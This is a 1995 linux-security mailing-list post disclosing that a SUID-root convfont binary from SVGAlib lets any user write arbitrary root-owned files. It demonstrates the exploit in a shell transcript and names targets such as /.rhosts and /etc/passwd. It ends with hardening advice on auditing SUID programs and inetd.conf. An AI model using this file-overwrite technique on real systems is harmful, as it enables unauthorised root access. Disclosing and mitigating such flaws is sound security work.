[73] in linux-security and linux-alert archive
Re: Secure setup for file transfer
daemon@ATHENA.MIT.EDU (Panzer Boy)
Thu Mar 9 09:04:42 1995
To: linux-security@tarsier.cv.nrao.edu
From: panzer@dhp.com (Panzer Boy)
Date: 9 Mar 1995 00:55:03 -0500
Reply-To: linux-security@tarsier.cv.nrao.edu
Mr Martin J Hargreaves (ch11mh@surrey.ac.uk) wrote:
: On 7 Mar 1995, Panzer Boy wrote:
: > OB linux-security, SVGAlib with convfont being SUID root. Allows you to
: > write any files as root.
: Is this list going to be full disclosue like bugtraq? If so can
: we have details? Otherwise do you have a fix (other than only running
: SVGAlib programs as root).
I'm not sure about full disclosure, as I don't run this list, nor do I
think that we should discuss the merits of non vs. full, as this will
make more posts than the shadow discussion. If you have other security
problems like this, please post.
convfont text-file <LENGTH-OF-TEXT-FILE> /anyfile
Here:
> echo >/tmp/file "Hello"
> ls -l /tmp/file
-rw------- 1 panzer users 6 Mar 9 00:02 /tmp/file
> ls -l /usr/local/bin/convfont
-rwsr-xr-x 1 root users 2272 May 26 1994 /usr/local/bin/convfont*
> /usr/local/bin/convfont /tmp/file 6 /tmp/new-root-file
Converting 1 characters
Writing font file.
> ls -l /tmp/new-root-file
-rw------- 1 root users 8192 Mar 9 00:03 /tmp/new-root-file
/tmp/new-root-file is "Hello" followed by a lot of space. Instant
/.rhosts, /etc/passwd(shadow), hosts, inetd.conf, anything.
If you are concerned about security start with the simple standby:
find / -perm -4000 -print
This will search your entire drive for any SUID programs. Make sure that
all of these need to be SUID. Have SVGA stuff, make a "lusers" group for
"Local Users" and chmod 4750 those files. People who telnet in have no
reason to run svgalib progs, change your x-servers to the same
permission, again, non-local users should not be starting X on your machine.
Look in /etc/inetd.conf. Make sure you are only allowing access to
things you want to give out access to. If in doubt, comment it out, and
see if you need it, you can always put it back.
--
-Matt (panzer@dhp.com) DI-1-9026
"That which can never be enforced should not be prohibited."
